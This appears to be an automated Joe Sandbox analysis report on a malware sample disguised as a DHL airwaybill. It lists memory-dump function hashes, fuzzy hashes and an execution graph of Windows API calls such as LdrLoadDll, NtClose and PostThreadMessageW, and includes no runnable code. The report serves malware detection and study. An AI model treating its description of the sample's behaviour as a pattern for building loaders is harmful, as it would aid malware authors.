                • Instruction ID: 5c7badc4f6e75da1899d863d997bd13fc464cc914377d57d00756493e7873549
                • Opcode Fuzzy Hash: 5482f272ba0ecd350d076d79eda25838160521ce1ca7defd26c47fb4c8676beb
                • Instruction Fuzzy Hash: 8421D779605204EFDB05DF14D5C0F25BBA5FB84318F24CA6DE9194B352C3BAD846CA61
                Function 0094D01C Relevance: .1, Instructions: 72COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2153034298.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_94d000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ab451c1f70ac2721c096256c48df29f281920aed9165d940efb3a6f60bdee95b
                • Instruction ID: a389a364654d2fa20de87eb507c903ff368067872fee3cb7ac042855c4a5132b
                • Opcode Fuzzy Hash: ab451c1f70ac2721c096256c48df29f281920aed9165d940efb3a6f60bdee95b
                • Instruction Fuzzy Hash: 9B21F279604204EFDB14DF24D9C4F26BB65FB84314F20C96DD90A4B286C37AD847CA61
                Function 0094D006 Relevance: .1, Instructions: 62COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2153034298.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_94d000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8320b9b08f85713de917820f1317cd6036c7ba088c430111f7cc7b5efea78531
                • Instruction ID: f353729a339e700586ebb7fba657c31f95f84cd4ec971101de1753db8d34ce9e
                • Opcode Fuzzy Hash: 8320b9b08f85713de917820f1317cd6036c7ba088c430111f7cc7b5efea78531
                • Instruction Fuzzy Hash: C3218E755093809FCB12CF20D994B15BF71EB46314F28C5EAD8498F2A7C33A980ACB62
                Function 0093D3D3 Relevance: .1, Instructions: 56COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2152974779.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_93d000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                • Instruction ID: c81d85d181e34e018bfb33b72cf90286bbcf6a5455ce0d37b9f6f03f3a53b49c
                • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                • Instruction Fuzzy Hash: 3211D376504240DFDB16CF10E5D4B16BF72FB94324F24C6A9D8490B666C33AE85ACFA2
                Function 0093D4BF Relevance: .1, Instructions: 56COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2152974779.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_93d000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                • Instruction ID: 8b21df486d7d9e2c2402aecdf7c2aca5fbfacfc955cb9bc8c772e198487f25da
                • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                • Instruction Fuzzy Hash: EC112672504280DFCB02CF10D5D0B16BF72FB84314F24C6A9E8090B25AC33AD85ACFA2
                Function 0094D1CF Relevance: .1, Instructions: 53COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2153034298.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_94d000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                • Instruction ID: f606c197ccb104877e55a478e707e8d03b81105434b64ade2572c986ed650798
                • Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                • Instruction Fuzzy Hash: AC118B79904284DFDB15CF10D5C4B15FBA1FB84314F24C6A9D8494B696C37AD84ACB62
                Function 0093D731 Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2152974779.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_93d000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e6a01f0744c824c064b73ded3f88a7168bf99f4a1f29bf7e49684637a9d0e659
                • Instruction ID: eec70a728bc7dee8129660213545e3aa33062acb756f594bfa8000ea29053e2e
                • Opcode Fuzzy Hash: e6a01f0744c824c064b73ded3f88a7168bf99f4a1f29bf7e49684637a9d0e659
                • Instruction Fuzzy Hash: EF01A7B1406344DAE7105B25ED94B66FFDCEF81764F148419ED0A4A286C7789C44CA72
                Function 0093D730 Relevance: .0, Instructions: 36COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2152974779.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_93d000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2e27ee91d4dffc5ef8939bba3f5de4c8be0be0873572c029279bbb04837244ea
                • Instruction ID: 3c7ad379094dd93d6b28f69e93fdf050058af38c863de84381603daeaf69172f
                • Opcode Fuzzy Hash: 2e27ee91d4dffc5ef8939bba3f5de4c8be0be0873572c029279bbb04837244ea
                • Instruction Fuzzy Hash: 2CF06271406344AEE7208A15D994B66FFDCEB91734F18C55AED094F286C3799C44CA71

                Non-executed Functions

                Function 06B27E48 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: }U%g
                • API String ID: 0-3913510682
                • Opcode ID: b95883b4976b39e965b15e62625e291cc13bc95141cc0943d3cc22b4ea50a2bd
                • Instruction ID: 3b3edf1e5ebe3c154bc60762e0798e9e6c0300ad3caaaa630c55ccc5ee8f2ca3
                • Opcode Fuzzy Hash: b95883b4976b39e965b15e62625e291cc13bc95141cc0943d3cc22b4ea50a2bd
                • Instruction Fuzzy Hash: CDE1EBB4E002698FDB14DFA9C580AAEBBF2FF89305F24C169D419AB355D7349941CFA0
                Function 02790040 Relevance: .3, Instructions: 315COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2154197406.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2790000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0c985adba307a3d3855f0d9d6090ae0e350dc579f496a370e518807d1913376c
                • Instruction ID: bea8876207ba19700ede9ce94f26fa7a410cee5cf9fa190303499833e033e8a6
                • Opcode Fuzzy Hash: 0c985adba307a3d3855f0d9d6090ae0e350dc579f496a370e518807d1913376c
                • Instruction Fuzzy Hash: 921261B2412B458EE710CF66FD4C18A7BA2FB85319B60460BD2617E2F1DBB9114ECF64
                Function 06B26648 Relevance: .3, Instructions: 312COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e1a7bb4ccf9f43a38e1daccd3c11472e83f884a1aceaa4cdaad002ba72ba8ded
                • Instruction ID: c971c2e1e77b4005e0c62f5b66b123aa488737a70a28dcb37a76cb576f8f792a
                • Opcode Fuzzy Hash: e1a7bb4ccf9f43a38e1daccd3c11472e83f884a1aceaa4cdaad002ba72ba8ded
                • Instruction Fuzzy Hash: AFE1FBB4E002698FDB14DFA9C580AAEBBF2FF49305F24C169D819AB355D7309941CFA1
                Function 06B287F8 Relevance: .3, Instructions: 312COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a08ddb31bd29fb504870e356a054301c468d8e5e8ee3f154b2ccc297e562d381
                • Instruction ID: 6adbad2c141e8978976ecda816f84514ff8e4187a62f3aa6fade641b75afb8d4
                • Opcode Fuzzy Hash: a08ddb31bd29fb504870e356a054301c468d8e5e8ee3f154b2ccc297e562d381
                • Instruction Fuzzy Hash: 75E10AB4E002598FDB14DFA9C580AAEBBF2FF89305F24C169D409AB355D731A941CFA0
                Function 06B26210 Relevance: .3, Instructions: 312COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6456a658d517e0416b0cce3bae3c4077d57fe8ad5c405c5ece94596c434d7c90
                • Instruction ID: 1ed016d12ffc43f20e1889fc9b9803fa5c3ecc1f8b60c3f2fa8838544a8d97cb
                • Opcode Fuzzy Hash: 6456a658d517e0416b0cce3bae3c4077d57fe8ad5c405c5ece94596c434d7c90
                • Instruction Fuzzy Hash: 74E1FAB4E002598FDB14DFA9C580AAEBBF2FF89305F24C169D419AB355D734A941CFA0
                Function 06B25DD8 Relevance: .3, Instructions: 312COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 406e8ce002a5c147080070e65e7fda05db4f33d1ea5ecbab343f52147a7fd4e8
                • Instruction ID: f85b8d41ba3ca62fbeba6e77ab9cc69f79fa33de6d87adb3265acce125fc0a82
                • Opcode Fuzzy Hash: 406e8ce002a5c147080070e65e7fda05db4f33d1ea5ecbab343f52147a7fd4e8
                • Instruction Fuzzy Hash: ECE1DB74E002698FDB14DFA9C580AAEBBF2FF49305F24C169D419AB355D734A941CFA0
                Function 00C1D2A4 Relevance: .3, Instructions: 264COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2153519802.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c10000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d1e62d99f79d47f536a2463dae3c02f341014078e806ae55a2b29ab8be5c97f9
                • Instruction ID: aaceee0d7e84d3b4e90776bf66fce1e9452bdf512e43c8d7c6039ebf176983ff
                • Opcode Fuzzy Hash: d1e62d99f79d47f536a2463dae3c02f341014078e806ae55a2b29ab8be5c97f9
                • Instruction Fuzzy Hash: C1A15C32E002198FCF05DFB5C8449DEBBB2FF86300B15857AE815AB265DB71E956DB80
                Function 04D55110 Relevance: .3, Instructions: 264COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2156642635.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d50000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2f19b48c862aedb9321e675b5f44e53ee8e79898d7b1c67d840fd063cb5c8bc8
                • Instruction ID: f9ba8e848ab0cbdfb8b4c41fb01eb39540ad053a2270b49956ac89b77360014d
                • Opcode Fuzzy Hash: 2f19b48c862aedb9321e675b5f44e53ee8e79898d7b1c67d840fd063cb5c8bc8
                • Instruction Fuzzy Hash: 74D1E835D2065A8ACB01EB64D990BDDB771EFDA300F10C7AAE5593B610EB706AC5CF81
                Function 02790007 Relevance: .2, Instructions: 246COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2154197406.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2790000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8d132cab10967d319ed2f1e7be21dbfc97129f139b2c67d8bf26c539097bda85
                • Instruction ID: c63ade3cec5ec83f618f3921f1c6eb84c7c817babc31b0a486269b8252a07cf6
                • Opcode Fuzzy Hash: 8d132cab10967d319ed2f1e7be21dbfc97129f139b2c67d8bf26c539097bda85
                • Instruction Fuzzy Hash: 57D1E4B2812B458ED710CF6AFC4818A7BB2EB86315B65460BD1617F2F1DBB8144ECF64
                Function 06B26638 Relevance: .1, Instructions: 133COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 85aff5f0fee9d5c1f1f86866afc81d6da1de391b595c229b680417be74858b40
                • Instruction ID: d998210bed37b6dfb184dc6b488bed3a46f054d3529257672bef6d2019a4b0e8
                • Opcode Fuzzy Hash: 85aff5f0fee9d5c1f1f86866afc81d6da1de391b595c229b680417be74858b40
                • Instruction Fuzzy Hash: 6B512C74E002198BDB14CFA9D580AAEFBF2FF89305F24C169D418AB355D7349942CFA1
                Function 06B26200 Relevance: .1, Instructions: 132COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d454d5fe21b7752ed4c3c5ccbfae7f4b104a5952c0f681ee8131bc97babfadb3
                • Instruction ID: 9cf0c634d64fc44ebfe4b3959c4cedfd6f247ff88df369d3b03a23ce754fe731
                • Opcode Fuzzy Hash: d454d5fe21b7752ed4c3c5ccbfae7f4b104a5952c0f681ee8131bc97babfadb3
                • Instruction Fuzzy Hash: C351FAB0E002298FDB14DFA9C5809AEBBF2FF89305F24C1A9D418AB355D7359941CFA1
                Function 06B25DC8 Relevance: .1, Instructions: 131COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c3af6518e25f3ede6720ff7c517bdbcdc190c46096c25c2c9f9d2df6c0835282
                • Instruction ID: 78fcd2fcf36c24c7e599a42f10c85cb10f31f7b395da7b58816a29b43f07d2c4
                • Opcode Fuzzy Hash: c3af6518e25f3ede6720ff7c517bdbcdc190c46096c25c2c9f9d2df6c0835282
                • Instruction Fuzzy Hash: 53511C71E102198BDB14DFA9C580AAEFBF2FF89305F24C169D418AB355D7359942CFA0

                Execution Graph

                Execution Coverage:1.3%
                Dynamic/Decrypted Code Coverage:4.9%
                Signature Coverage:7.7%
                Total number of Nodes:143
                Total number of Limit Nodes:8
                execution_graph 94146 424673 94147 42468f 94146->94147 94148 4246b7 94147->94148 94149 4246cb 94147->94149 94150 42c2e3 NtClose 94148->94150 94151 42c2e3 NtClose 94149->94151 94152 4246c0 94150->94152 94153 4246d4 94151->94153 94156 42e4d3 RtlAllocateHeap 94153->94156 94155 4246df 94156->94155 94157 42f573 94158 42f583 94157->94158 94159 42f589 94157->94159 94162 42e493 94159->94162 94161 42f5af 94165 42c603 94162->94165 94164 42e4ae 94164->94161 94166 42c620 94165->94166 94167 42c631 RtlAllocateHeap 94166->94167 94167->94164 94168 424a13 94173 424a2c 94168->94173 94169 424abc 94170 424a77 94176 42e3b3 94170->94176 94173->94169 94173->94170 94174 424ab7 94173->94174 94175 42e3b3 RtlFreeHeap 94174->94175 94175->94169 94179 42c653 94176->94179 94178 424a84 94180 42c670 94179->94180 94181 42c681 RtlFreeHeap 94180->94181 94181->94178 94182 42b8d3 94183 42b8ed 94182->94183 94186 1b42df0 LdrInitializeThunk 94183->94186 94184 42b915 94186->94184 94107 413da3 94108 413daa 94107->94108 94113 417533 94108->94113 94110 413dda 94111 413e26 94110->94111 94112 413e13 PostThreadMessageW 94110->94112 94112->94111 94114 417557 94113->94114 94115 417593 LdrLoadDll 94114->94115 94116 41755e 94114->94116 94115->94116 94116->94110 94117 418ba3 94118 418bd3 94117->94118 94120 418bff 94118->94120 94121 41b093 94118->94121 94123 41b0d7 94121->94123 94122 41b0f8 94122->94118 94123->94122 94125 42c2e3 94123->94125 94126 42c2fd 94125->94126 94127 42c30e NtClose 94126->94127 94127->94122 94128 4117a3 94129 4117b8 94128->94129 94134 413ab3 94129->94134 94132 42c2e3 NtClose 94133 4117d1 94132->94133 94136 413ad9 94134->94136 94135 4117c4 94135->94132 94136->94135 94138 413833 94136->94138 94139 413855 94138->94139 94141 42c563 94138->94141 94139->94135 94142 42c580 94141->94142 94145 1b42c70 LdrInitializeThunk 94142->94145 94143 42c5a8 94143->94139 94145->94143 94187 41a353 94188 41a36b 94187->94188 94190 41a3c5 94187->94190 94188->94190 94191 41e273 94188->94191 94192 41e299 94191->94192 94196 41e390 94192->94196 94197 42f6a3 94192->94197 94194 41e32e 94194->94196 94203 42b923 94194->94203 94196->94190 94198 42f613 94197->94198 94199 42e493 RtlAllocateHeap 94198->94199 94201 42f670 94198->94201 94200 42f64d 94199->94200 94202 42e3b3 RtlFreeHeap 94200->94202 94201->94194 94202->94201 94204 42b93d 94203->94204 94207 1b42c0a 94204->94207 94205 42b969 94205->94196 94208 1b42c11 94207->94208 94209 1b42c1f LdrInitializeThunk 94207->94209 94208->94205 94209->94205 94210 1b42b60 LdrInitializeThunk 94211 401abc 94212 401ad0 94211->94212 94215 42fa43 94212->94215 94218 42df63 94215->94218 94219 42df89 94218->94219 94230 407543 94219->94230 94221 42df9f 94229 401b4c 94221->94229 94233 41aea3 94221->94233 94223 42dfbe 94224 42dfd3 94223->94224 94248 42c6a3 94223->94248 94244 427fa3 94224->94244 94227 42dfed 94228 42c6a3 ExitProcess 94227->94228 94228->94229 94251 4161f3 94230->94251 94232 407550 94232->94221 94234 41aecf 94233->94234 94262 41ad93 94234->94262 94237 41af14 94240 41af30 94237->94240 94242 42c2e3 NtClose 94237->94242 94238 41aefc 94239 41af07 94238->94239 94241 42c2e3 NtClose 94238->94241 94239->94223 94240->94223 94241->94239 94243 41af26 94242->94243 94243->94223 94245 428005 94244->94245 94247 428012 94245->94247 94273 4183a3 94245->94273 94247->94227 94249 42c6c0 94248->94249 94250 42c6d1 ExitProcess 94249->94250 94250->94224 94252 41620d 94251->94252 94254 416226 94252->94254 94255 42cd33 94252->94255 94254->94232 94257 42cd4d 94255->94257 94256 42cd7c 94256->94254 94257->94256 94258 42b923 LdrInitializeThunk 94257->94258 94259 42cddc 94258->94259 94260 42e3b3 RtlFreeHeap 94259->94260 94261 42cdf5 94260->94261 94261->94254 94263 41ae89 94262->94263 94264 41adad 94262->94264 94263->94237 94263->94238 94268 42b9c3 94264->94268 94267 42c2e3 NtClose 94267->94263 94269 42b9dd 94268->94269 94272 1b435c0 LdrInitializeThunk 94269->94272 94270 41ae7d 94270->94267 94272->94270 94275 4183cd 94273->94275 94274 4188db 94274->94247 94275->94274 94281 413a13 94275->94281 94277 4184fa 94277->94274 94278 42e3b3 RtlFreeHeap 94277->94278 94279 418512 94278->94279 94279->94274 94280 42c6a3 ExitProcess 94279->94280 94280->94274 94285 413a33 94281->94285 94283 413a92 94283->94277 94284 413a9c 94284->94277 94285->94284 94286 41b1b3 RtlFreeHeap LdrInitializeThunk 94285->94286 94286->94283

                Executed Functions

                Function 00417533 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 69 417533-41754f 70 417557-41755c 69->70 71 417552 call 42f0b3 69->71 72 417562-417570 call 42f6b3 70->72 73 41755e-417561 70->73 71->70 76 417580-417591 call 42da33 72->76 77 417572-41757d call 42f953 72->77 82 417593-4175a7 LdrLoadDll 76->82 83 4175aa-4175ad 76->83 77->76 82->83
                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175A5
                Memory Dump Source
                • Source File: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: db8ee8fa6869118bf05ef2a336e82e6538ab0c4bc372bbb6e22ac2f78f82d93c
                • Instruction ID: 1ec0bed434553549db5c626065e3c79ad4c6ac2a6111f91c4d8a9dbfaf4de485
                • Opcode Fuzzy Hash: db8ee8fa6869118bf05ef2a336e82e6538ab0c4bc372bbb6e22ac2f78f82d93c
                • Instruction Fuzzy Hash: CA0171B2E0420DBBDF10DBE1DC42FDEB7789B54308F4081AAE90897241F635EB488B95
                Function 0042C2E3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 94 42c2e3-42c31c call 404893 call 42d523 NtClose
                APIs
                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C317
                Memory Dump Source
                • Source File: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: eb59faf3b5f3930f1af6bf4b5e54f6bf374c1ede358e3a2ac458fab30b9232ef
                • Instruction ID: 1839010a0fb26ebc2b48a4b82397d3f65e66571f39a56f5f23fe68b823110568
                • Opcode Fuzzy Hash: eb59faf3b5f3930f1af6bf4b5e54f6bf374c1ede358e3a2ac458fab30b9232ef
                • Instruction Fuzzy Hash: F9E08676640615BBD610FA5ADC41F97776CDFC5714F41442AFA0867242C670B90487F4
                Function 01B42B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 108 1b42b60-1b42b6c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: a2104f661ec30f26174805a10698cec79dd387087777ec002c2e8b0aba6664cb
                • Instruction ID: 860f7589fcfa175ec6554bd67d634d95fe92c3d28debbd688f015f4c0eb6253c
                • Opcode Fuzzy Hash: a2104f661ec30f26174805a10698cec79dd387087777ec002c2e8b0aba6664cb
                • Instruction Fuzzy Hash: CC90026220240003424972594414716400A97E0201B55C061F5014591DC62589916625
                Function 01B42DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 110 1b42df0-1b42dfc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: e2ff1aaf3edc822f418746fc57ad94045a6838bcccb6476b21ea2a5006bb924b
                • Instruction ID: 45fa7125a4557ee10c7df41e01943bbb7155c0b51057176f221b0715ef120698
                • Opcode Fuzzy Hash: e2ff1aaf3edc822f418746fc57ad94045a6838bcccb6476b21ea2a5006bb924b
                • Instruction Fuzzy Hash: 2490023220140413D25572594504707000997D0241F95C452B4424559DD7568A52A621
                Function 01B42C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 109 1b42c70-1b42c7c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 0374cf7751873a985837d6e6f3ed70bb64b8c58d855650dac6ce2e7c48ac0f84
                • Instruction ID: 32540bf5ed79f0c7fc1e98405e88caff6ab04efdc65e1c4034dc266f44c72ff6
                • Opcode Fuzzy Hash: 0374cf7751873a985837d6e6f3ed70bb64b8c58d855650dac6ce2e7c48ac0f84
                • Instruction Fuzzy Hash: C090023220148802D2547259840474A000597D0301F59C451B8424659DC79589917621
                Function 01B435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 111 1b435c0-1b435cc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: daa870492c28b1da8612d95262e12a5aa2f70122b5e4ce3e12cb7961e9020a7f
                • Instruction ID: b437bb11a05122b8bc7e6fd701395ead23cce45fb2c48d2052129b062ad14a9f
                • Opcode Fuzzy Hash: daa870492c28b1da8612d95262e12a5aa2f70122b5e4ce3e12cb7961e9020a7f
                • Instruction Fuzzy Hash: C790023260550402D24472594514706100597D0201F65C451B4424569DC7958A516AA2
                Function 00413D97 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 72threadwindowCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • PostThreadMessageW.USER32(14_8-J-J8,00000111,00000000,00000000), ref: 00413E20
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID: 14_8-J-J8$14_8-J-J8$8
                • API String ID: 1836367815-3311450054
                • Opcode ID: 87aa12d475b46fc3ff8fd7bd31b88656a3ce5379dd721831d59135c5ee513f13
                • Instruction ID: 0d0eda9b9005393d4cfcb9d556079f3e780f2d68baffe0cc6929e9a00667b133
                • Opcode Fuzzy Hash: 87aa12d475b46fc3ff8fd7bd31b88656a3ce5379dd721831d59135c5ee513f13
